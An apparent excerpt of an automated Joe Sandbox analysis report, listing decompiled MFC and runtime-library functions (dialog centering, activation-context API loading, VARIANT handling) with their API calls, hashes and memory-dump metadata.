                                                      0x00419603
                                                      0x00000000
                                                      0x00000000
                                                      0x00419603
                                                      0x00000000
                                                      0x004195f2
                                                      0x00419605
                                                      0x00419607
                                                      0x0041962c
                                                      0x0041962c
                                                      0x00419633
                                                      0x00419643
                                                      0x00419643
                                                      0x00419645
                                                      0x00000000
                                                      0x00419647
                                                      0x00419647
                                                      0x0041964a
                                                      0x0041964c
                                                      0x00000000
                                                      0x0041964e
                                                      0x00419651
                                                      0x00419655
                                                      0x00419659
                                                      0x00419664
                                                      0x00419664
                                                      0x00419668
                                                      0x00000000
                                                      0x0041966a
                                                      0x0041966a
                                                      0x00419671
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419671
                                                      0x0041965b
                                                      0x0041965b
                                                      0x00419662
                                                      0x00419673
                                                      0x00419673
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419662
                                                      0x00419659
                                                      0x0041964c
                                                      0x00419635
                                                      0x00419635
                                                      0x00419638
                                                      0x00000000
                                                      0x0041963a
                                                      0x0041963a
                                                      0x00419641
                                                      0x0041967a
                                                      0x0041967a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419641
                                                      0x00419638
                                                      0x00419609
                                                      0x00419609
                                                      0x0041960c
                                                      0x0041960e
                                                      0x00000000
                                                      0x00419610
                                                      0x00419610
                                                      0x00419614
                                                      0x00000000
                                                      0x00419616
                                                      0x00419616
                                                      0x0041961c
                                                      0x0041961f
                                                      0x00419622
                                                      0x00419624
                                                      0x00000000
                                                      0x00419626
                                                      0x00419626
                                                      0x00419626
                                                      0x00419624
                                                      0x00419614
                                                      0x0041960e
                                                      0x00419607
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004195bd
                                                      0x004197e5
                                                      0x00419541
                                                      0x00419541
                                                      0x00419546
                                                      0x00419549
                                                      0x0041954e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041954e
                                                      0x0041951b
                                                      0x0041951b
                                                      0x00419520
                                                      0x00419527
                                                      0x00419522
                                                      0x00419522
                                                      0x00419522
                                                      0x0041952b
                                                      0x00000000
                                                      0x0041952d
                                                      0x00419536
                                                      0x00419550
                                                      0x00419550
                                                      0x00419553
                                                      0x00000000
                                                      0x00419555
                                                      0x00419555
                                                      0x00419558
                                                      0x0041955a
                                                      0x0041955a
                                                      0x0041955d
                                                      0x0041955e
                                                      0x00419564
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419564
                                                      0x00419538
                                                      0x00419538
                                                      0x00419538
                                                      0x00419568
                                                      0x0041956c
                                                      0x0041956c
                                                      0x00419536
                                                      0x0041952b
                                                      0x00419507
                                                      0x00419507
                                                      0x00419511
                                                      0x00419515
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419515
                                                      0x00000000
                                                      0x00419505
                                                      0x00419566
                                                      0x00419566
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                      • String ID:
                                                      • API String ID: 656273425-0
                                                      • Opcode ID: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
                                                      • Instruction ID: b37fad4d356144a07009b57323d5ed8e9dfbb1bd6742926c0fb4062ff0804fd9
                                                      • Opcode Fuzzy Hash: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
                                                      • Instruction Fuzzy Hash: 04F18C31910206EBDF21AF65C8A4BEF7BA5AF44354F14402FE815A72A1DB3C9DC1CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E0040966B(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				struct tagRECT _v28;
                                                      				struct tagRECT _v44;
                                                      				struct tagRECT _v60;
                                                      				struct tagRECT _v80;
                                                      				char _v100;
                                                      				void* __edi;
                                                      				intOrPtr _t58;
                                                      				struct HWND__* _t59;
                                                      				intOrPtr _t94;
                                                      				signed int _t103;
                                                      				struct HWND__* _t104;
                                                      				void* _t105;
                                                      				struct HWND__* _t107;
                                                      				long _t108;
                                                      				long _t116;
                                                      				void* _t119;
                                                      				struct HWND__* _t121;
                                                      				void* _t123;
                                                      				intOrPtr _t125;
                                                      				intOrPtr _t129;
                                                      
                                                      				_t119 = __edx;
                                                      				_t105 = __ebx;
                                                      				_t125 = __ecx;
                                                      				_v12 = __ecx;
                                                      				_v8 = E0040C981(__ecx);
                                                      				_t58 = _a4;
                                                      				if(_t58 == 0) {
                                                      					if((_v8 & 0x40000000) == 0) {
                                                      						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                      					} else {
                                                      						_t59 = GetParent( *(__ecx + 0x20));
                                                      					}
                                                      					_t121 = _t59;
                                                      					if(_t121 != 0) {
                                                      						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                      						if(_t104 != 0) {
                                                      							_t121 = _t104;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t4 = _t58 + 0x20; // 0xc033d88b
                                                      					_t121 =  *_t4;
                                                      				}
                                                      				_push(_t105);
                                                      				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                      				if((_v8 & 0x40000000) != 0) {
                                                      					_t107 = GetParent( *(_t125 + 0x20));
                                                      					GetClientRect(_t107,  &_v28);
                                                      					GetClientRect(_t121,  &_v44);
                                                      					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                      				} else {
                                                      					if(_t121 != 0) {
                                                      						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                      						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                      							_t121 = 0;
                                                      						}
                                                      					}
                                                      					_v100 = 0x28;
                                                      					if(_t121 != 0) {
                                                      						GetWindowRect(_t121,  &_v44);
                                                      						E00407923(_t121, E004078B8(_t121, 2),  &_v100);
                                                      						CopyRect( &_v28,  &_v80);
                                                      					} else {
                                                      						_t94 = E00403ED6();
                                                      						if(_t94 != 0) {
                                                      							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                      						}
                                                      						E00407923(_t121, E004078B8(_t94, 1),  &_v100);
                                                      						CopyRect( &_v44,  &_v80);
                                                      						CopyRect( &_v28,  &_v80);
                                                      					}
                                                      				}
                                                      				_t108 = _v60.left;
                                                      				asm("cdq");
                                                      				_t123 = _v60.right - _t108;
                                                      				asm("cdq");
                                                      				_t120 = _v44.bottom;
                                                      				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                      				_a4 = _v60.bottom - _v60.top;
                                                      				asm("cdq");
                                                      				asm("cdq");
                                                      				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                      				if(_t116 >= _v28.left) {
                                                      					if(_t123 + _t116 > _v28.right) {
                                                      						_t116 = _t108 - _v60.right + _v28.right;
                                                      					}
                                                      				} else {
                                                      					_t116 = _v28.left;
                                                      				}
                                                      				if(_t129 >= _v28.top) {
                                                      					if(_a4 + _t129 > _v28.bottom) {
                                                      						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                      					}
                                                      				} else {
                                                      					_t129 = _v28.top;
                                                      				}
                                                      				return E0040CC5E(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                      			}

























                                                      APIs
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      • GetParent.USER32(?), ref: 00409698
                                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004096BB
                                                      • GetWindowRect.USER32 ref: 004096D5
                                                      • GetWindowLongA.USER32 ref: 004096EB
                                                      • CopyRect.USER32 ref: 00409738
                                                      • CopyRect.USER32 ref: 00409742
                                                      • GetWindowRect.USER32 ref: 0040974B
                                                      • CopyRect.USER32 ref: 00409767
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                      • String ID: (
                                                      • API String ID: 808654186-3887548279
                                                      • Opcode ID: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
                                                      • Instruction ID: bc6882baaa5189169e0c0b7d53e15d52d0ad1cceba646d15ad8487012d1c9b7f
                                                      • Opcode Fuzzy Hash: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
                                                      • Instruction Fuzzy Hash: 39513072910219ABDB00DFA8CD85EEEBBB9AF88314F154136F905F3291D734AD41CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040D31B(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
                                                      				void* _v8;
                                                      				void* _v20;
                                                      				void* _t16;
                                                      
                                                      				_t16 = __ecx;
                                                      				_a100 = _a100 + __edx;
                                                      			}







                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040D349
                                                      • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040D35B
                                                      • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040D36D
                                                      • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040D37F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: $dD$ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                      • API String ID: 667068680-1206286444
                                                      • Opcode ID: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
                                                      • Instruction ID: 8662d49a9f014bf3ccbdae78ec47047f6782647d52dd8aec524ec0572c096a73
                                                      • Opcode Fuzzy Hash: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
                                                      • Instruction Fuzzy Hash: EDF0F8B8945320AFCF109F71BD09A897EE8E60F7917225077A400A3266D67991008E9F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0041BDF7(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				CHAR* _t121;
                                                      				CHAR* _t127;
                                                      				CHAR* _t135;
                                                      				CHAR* _t140;
                                                      				signed short* _t142;
                                                      				CHAR* _t144;
                                                      				CHAR* _t148;
                                                      				CHAR* _t151;
                                                      				signed int _t158;
                                                      				signed int _t169;
                                                      				CHAR* _t173;
                                                      				void* _t176;
                                                      				void* _t179;
                                                      				signed short _t181;
                                                      				signed int _t183;
                                                      				intOrPtr _t185;
                                                      				CHAR* _t188;
                                                      				int _t190;
                                                      				char* _t193;
                                                      				void* _t194;
                                                      				void* _t195;
                                                      				CHAR* _t196;
                                                      				char* _t198;
                                                      				void* _t199;
                                                      				long long _t204;
                                                      
                                                      				_t199 = __eflags;
                                                      				_t185 = __edx;
                                                      				_push(0x50);
                                                      				E0041F789(E00433621, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
                                                      				E0040DBE0(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
                                                      				_t173 =  *(_t195 + 8);
                                                      				_t121 = _t173[8];
                                                      				_t187 = 0;
                                                      				 *(_t195 - 4) = 0;
                                                      				 *(_t195 - 0x1d) = 0;
                                                      				 *(_t195 - 0x18) = _t121;
                                                      				if(_t121 == 0) {
                                                      					 *(_t195 - 0x18) = _t195 - 0x1d;
                                                      				}
                                                      				_t190 = lstrlenA( *(_t195 - 0x18));
                                                      				 *(_t195 - 0x28) = _t173[0x10];
                                                      				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
                                                      				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
                                                      					L11:
                                                      					_t191 =  *(_t195 + 0x14);
                                                      					_t127 = E00401060(_t185,  *(_t191 + 8) << 4);
                                                      					__eflags = _t127;
                                                      					_pop(_t176);
                                                      					if(_t127 != 0) {
                                                      						_t191 =  *(_t191 + 8);
                                                      						__eflags = _t191 - 0x7ffffff;
                                                      						if(_t191 > 0x7ffffff) {
                                                      							goto L12;
                                                      						}
                                                      						_t192 = _t191 << 4;
                                                      						E0041E5F0(_t191 << 4);
                                                      						 *(_t195 - 0x10) = _t196;
                                                      						 *(_t195 - 0x1c) = _t196;
                                                      						E0041F330(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
                                                      						_t198 =  &(_t196[0xc]);
                                                      						_t187 = E0041B5F0(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
                                                      						_t49 = _t187 + 0x10; // 0x10
                                                      						_t191 = _t49;
                                                      						_t135 = E00401060(_t185, _t49);
                                                      						__eflags = _t135;
                                                      						if(_t135 == 0) {
                                                      							L4:
                                                      							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      							if( *(_t195 - 0x2c) == 0) {
                                                      								L7:
                                                      								L55:
                                                      								return E0041F7E5(_t173, _t187, _t191);
                                                      							}
                                                      							_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      							_push(0);
                                                      							L6:
                                                      							E0040D3B7();
                                                      							goto L7;
                                                      						}
                                                      						E0041E5F0(_t191);
                                                      						 *(_t195 - 0x10) = _t198;
                                                      						_t173 = 0;
                                                      						_t193 = _t198;
                                                      						 *((intOrPtr*)(_t195 - 0x58)) = 0x437058;
                                                      						 *((intOrPtr*)(_t195 - 0x54)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x48)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x50)) = 0;
                                                      						_t57 = _t195 - 0x58; // 0x437058
                                                      						_push( *(_t195 - 0x1c));
                                                      						_push( *((intOrPtr*)(_t195 + 0x18)));
                                                      						 *(_t195 - 4) = 1;
                                                      						_push( *(_t195 + 0x14));
                                                      						_push( *(_t195 - 0x24));
                                                      						_push(_t195 - 0x44);
                                                      						_push( *(_t195 - 0x18));
                                                      						_push(_t193);
                                                      						_t140 = E0041BB0F(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
                                                      						__eflags = _t140;
                                                      						 *(_t195 - 0x18) = _t140;
                                                      						if(_t140 != 0) {
                                                      							L26:
                                                      							_t191 =  *(_t195 + 0x14);
                                                      							_t187 = 0;
                                                      							__eflags =  *(_t191 + 8);
                                                      							if( *(_t191 + 8) <= 0) {
                                                      								L29:
                                                      								__eflags =  *(_t195 - 0x18);
                                                      								_t85 = _t195 - 0x58; // 0x437058
                                                      								_t179 = _t85;
                                                      								if( *(_t195 - 0x18) == 0) {
                                                      									E0041B9A1(_t179);
                                                      									_t142 =  *(_t195 + 0x10);
                                                      									__eflags = _t142;
                                                      									if(_t142 == 0) {
                                                      										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
                                                      										__eflags = _t144;
                                                      										if(_t144 == 0) {
                                                      											__imp__#6(_t173);
                                                      											L52:
                                                      											 *(_t195 - 4) = 0;
                                                      											E0041B9F7(_t195 - 0x58);
                                                      											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      											__eflags =  *(_t195 - 0x2c);
                                                      											if( *(_t195 - 0x2c) != 0) {
                                                      												_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      												_push(0);
                                                      												E0040D3B7();
                                                      											}
                                                      											__eflags = 0;
                                                      											goto L55;
                                                      										}
                                                      										_t148 = _t144 - 1;
                                                      										__eflags = _t148;
                                                      										if(_t148 == 0) {
                                                      											L48:
                                                      											__eflags = _t173;
                                                      											if(_t173 != 0) {
                                                      												 *((intOrPtr*)( *_t173 + 8))(_t173);
                                                      											}
                                                      											goto L52;
                                                      										}
                                                      										_t151 = _t148 - 3;
                                                      										__eflags = _t151;
                                                      										if(_t151 == 0) {
                                                      											__imp__#9(_t195 - 0x44);
                                                      											goto L52;
                                                      										}
                                                      										__eflags = _t151 != 1;
                                                      										if(_t151 != 1) {
                                                      											goto L52;
                                                      										}
                                                      										goto L48;
                                                      									}
                                                      									_t181 =  *(_t195 - 0x24);
                                                      									 *_t142 = _t181;
                                                      									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
                                                      									__eflags = _t183 - 0x13;
                                                      									if(_t183 > 0x13) {
                                                      										goto L52;
                                                      									}
                                                      									switch( *((intOrPtr*)(_t183 * 4 +  &M0041C107))) {
                                                      										case 0:
                                                      											L41:
                                                      											 *(__eax + 8) = __bx;
                                                      											goto L52;
                                                      										case 1:
                                                      											 *(__eax + 8) = __ebx;
                                                      											goto L52;
                                                      										case 2:
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											goto L52;
                                                      										case 3:
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											goto L52;
                                                      										case 4:
                                                      											__ecx =  *(__ebp - 0x44);
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											__ecx =  *(__ebp - 0x40);
                                                      											 *(__eax + 0xc) = __ecx;
                                                      											goto L52;
                                                      										case 5:
                                                      											__bx =  ~__bx;
                                                      											asm("sbb ebx, ebx");
                                                      											goto L41;
                                                      										case 6:
                                                      											__esi = __ebp - 0x44;
                                                      											__edi = __eax;
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											goto L52;
                                                      										case 7:
                                                      											goto L52;
                                                      										case 8:
                                                      											_t142[4] = _t173;
                                                      											goto L52;
                                                      									}
                                                      								}
                                                      								 *(_t195 - 4) = 0;
                                                      								E0041B9F7(_t179);
                                                      								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      								__eflags =  *(_t195 - 0x2c);
                                                      								if( *(_t195 - 0x2c) != 0) {
                                                      									_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      									_push(0);
                                                      									E0040D3B7();
                                                      								}
                                                      								goto L55;
                                                      							}
                                                      							do {
                                                      								__imp__#9( *(_t195 - 0x1c));
                                                      								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
                                                      								_t187 = _t187 + 1;
                                                      								__eflags = _t187 -  *(_t191 + 8);
                                                      							} while (_t187 <  *(_t191 + 8));
                                                      							goto L29;
                                                      						}
                                                      						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
                                                      						__eflags = _t158 - 4;
                                                      						_push(_t187);
                                                      						_push(_t193);
                                                      						_push( *(_t195 - 0x28));
                                                      						 *(_t195 - 4) = 2;
                                                      						if(_t158 == 4) {
                                                      							E0041D49C();
                                                      							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
                                                      							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
                                                      							L25:
                                                      							 *(_t195 - 4) = 1;
                                                      							goto L26;
                                                      						}
                                                      						__eflags = _t158 - 5;
                                                      						if(_t158 == 5) {
                                                      							L23:
                                                      							E0041D49C();
                                                      							 *((long long*)(_t195 - 0x44)) = _t204;
                                                      							goto L25;
                                                      						}
                                                      						__eflags = _t158 - 7;
                                                      						if(_t158 == 7) {
                                                      							goto L23;
                                                      						}
                                                      						__eflags = _t158 + 0xffffffec - 1;
                                                      						if(_t158 + 0xffffffec > 1) {
                                                      							_t173 = E0041D49C();
                                                      						} else {
                                                      							 *((intOrPtr*)(_t195 - 0x44)) = E0041D49C();
                                                      							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
                                                      						}
                                                      						goto L25;
                                                      					}
                                                      					L12:
                                                      					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t195 - 0x2c) - _t187;
                                                      					if( *(_t195 - 0x2c) == _t187) {
                                                      						goto L7;
                                                      					}
                                                      					_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      					_push(_t187);
                                                      					goto L6;
                                                      				}
                                                      				_t19 = _t190 + 3; // 0x3
                                                      				_t187 = _t19;
                                                      				if(E00401060(_t185, _t19) != 0) {
                                                      					E0041E5F0(_t187);
                                                      					 *(_t195 - 0x10) = _t196;
                                                      					_t188 = _t196;
                                                      					_t26 = _t190 + 3; // 0x3
                                                      					E00402FAA(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
                                                      					_t169 = _t173[0xc] & 0x0000ffff;
                                                      					_t196 =  &(_t196[0x10]);
                                                      					__eflags = _t169 - 8;
                                                      					 *(_t195 - 0x18) = _t188;
                                                      					if(_t169 == 8) {
                                                      						_t169 = 0xe;
                                                      					}
                                                      					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
                                                      					_t188[_t190] = 0xff;
                                                      					_t194 = _t190 + 1;
                                                      					_t188[_t194] = _t169;
                                                      					_t188[_t194 + 1] = 0;
                                                      					 *(_t195 - 0x28) = _t173[0x14];
                                                      					_t187 = 0;
                                                      					__eflags = 0;
                                                      					goto L11;
                                                      				}
                                                      				goto L4;
                                                      			}





























                                                      APIs
                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 0041BDFE
                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,00410F22,00000000,00000001,?,?,000000FF,?,?,?), ref: 0041BE30
                                                      • __alloca_probe_16.LIBCMT ref: 0041BE79
                                                        • Part of subcall function 00402FAA: _memcpy_s.LIBCMT ref: 00402FBA
                                                      • __alloca_probe_16.LIBCMT ref: 0041BEF0
                                                      • _memset.LIBCMT ref: 0041BF00
                                                      • __alloca_probe_16.LIBCMT ref: 0041BF29
                                                      • VariantClear.OLEAUT32(?), ref: 0041BFDF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                      • String ID: XpC
                                                      • API String ID: 2586305615-1560596422
                                                      • Opcode ID: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
                                                      • Instruction ID: fa49f027109238ab1e2c7d572b865a3b51314bf543938ae7db15aad6909c8791
                                                      • Opcode Fuzzy Hash: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
                                                      • Instruction Fuzzy Hash: EFA19B70800209DBCF11DFE9C885AEEBFB1FF08314F24815AE515B7291D7399A86DB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403901(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				_Unknown_base(*)()* _t9;
                                                      				struct HINSTANCE__* _t15;
                                                      				void* _t16;
                                                      				intOrPtr* _t18;
                                                      				char _t19;
                                                      				intOrPtr _t21;
                                                      				_Unknown_base(*)()* _t22;
                                                      				_Unknown_base(*)()* _t23;
                                                      
                                                      				_t16 = __esi;
                                                      				_t12 = __ecx;
                                                      				_t18 = __ecx;
                                                      				 *__ecx = _a4;
                                                      				_a4 = 0;
                                                      				_t19 =  *0x444a68; // 0x1
                                                      				if(_t19 == 0) {
                                                      					_t15 = GetModuleHandleA("KERNEL32");
                                                      					_t20 = _t15;
                                                      					if(_t15 == 0) {
                                                      						L2:
                                                      						E004037E3(0, _t12, _t15, _t16, _t20);
                                                      					}
                                                      					 *0x444a58 = GetProcAddress(_t15, "CreateActCtxA");
                                                      					 *0x444a5c = GetProcAddress(_t15, "ReleaseActCtx");
                                                      					 *0x444a60 = GetProcAddress(_t15, "ActivateActCtx");
                                                      					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                      					_t21 =  *0x444a58; // 0x747be4f0
                                                      					 *0x444a64 = _t9;
                                                      					_t16 = _t16;
                                                      					if(_t21 == 0) {
                                                      						__eflags =  *0x444a5c; // 0x74787540
                                                      						if(__eflags != 0) {
                                                      							goto L2;
                                                      						} else {
                                                      							__eflags =  *0x444a60; // 0x74787510
                                                      							if(__eflags != 0) {
                                                      								goto L2;
                                                      							} else {
                                                      								__eflags = _t9;
                                                      								if(__eflags != 0) {
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t22 =  *0x444a5c; // 0x74787540
                                                      						if(_t22 == 0) {
                                                      							goto L2;
                                                      						} else {
                                                      							_t23 =  *0x444a60; // 0x74787510
                                                      							if(_t23 == 0) {
                                                      								goto L2;
                                                      							} else {
                                                      								_t20 = _t9;
                                                      								if(_t9 == 0) {
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *0x444a68 = 1;
                                                      				}
                                                      				return _t18;
                                                      			}















                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,004043B9,000000FF), ref: 00403923
                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00403941
                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040394E
                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040395B
                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00403968
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                      • API String ID: 667068680-3617302793
                                                      • Opcode ID: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
                                                      • Instruction ID: 27b4460d09b63384aa497d3741584d63de93aff5ce20b31730bd6aa59633142a
                                                      • Opcode Fuzzy Hash: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
                                                      • Instruction Fuzzy Hash: 0011C2B59816889FCB20DFA9AC80716BFFCA6D6706710503FE141B2660D6B80A40CB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00410BD8(intOrPtr __ecx, signed int _a4) {
                                                      				signed int _v8;
                                                      				char _v40;
                                                      				void _v68;
                                                      				intOrPtr _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t12;
                                                      				void* _t14;
                                                      				char* _t23;
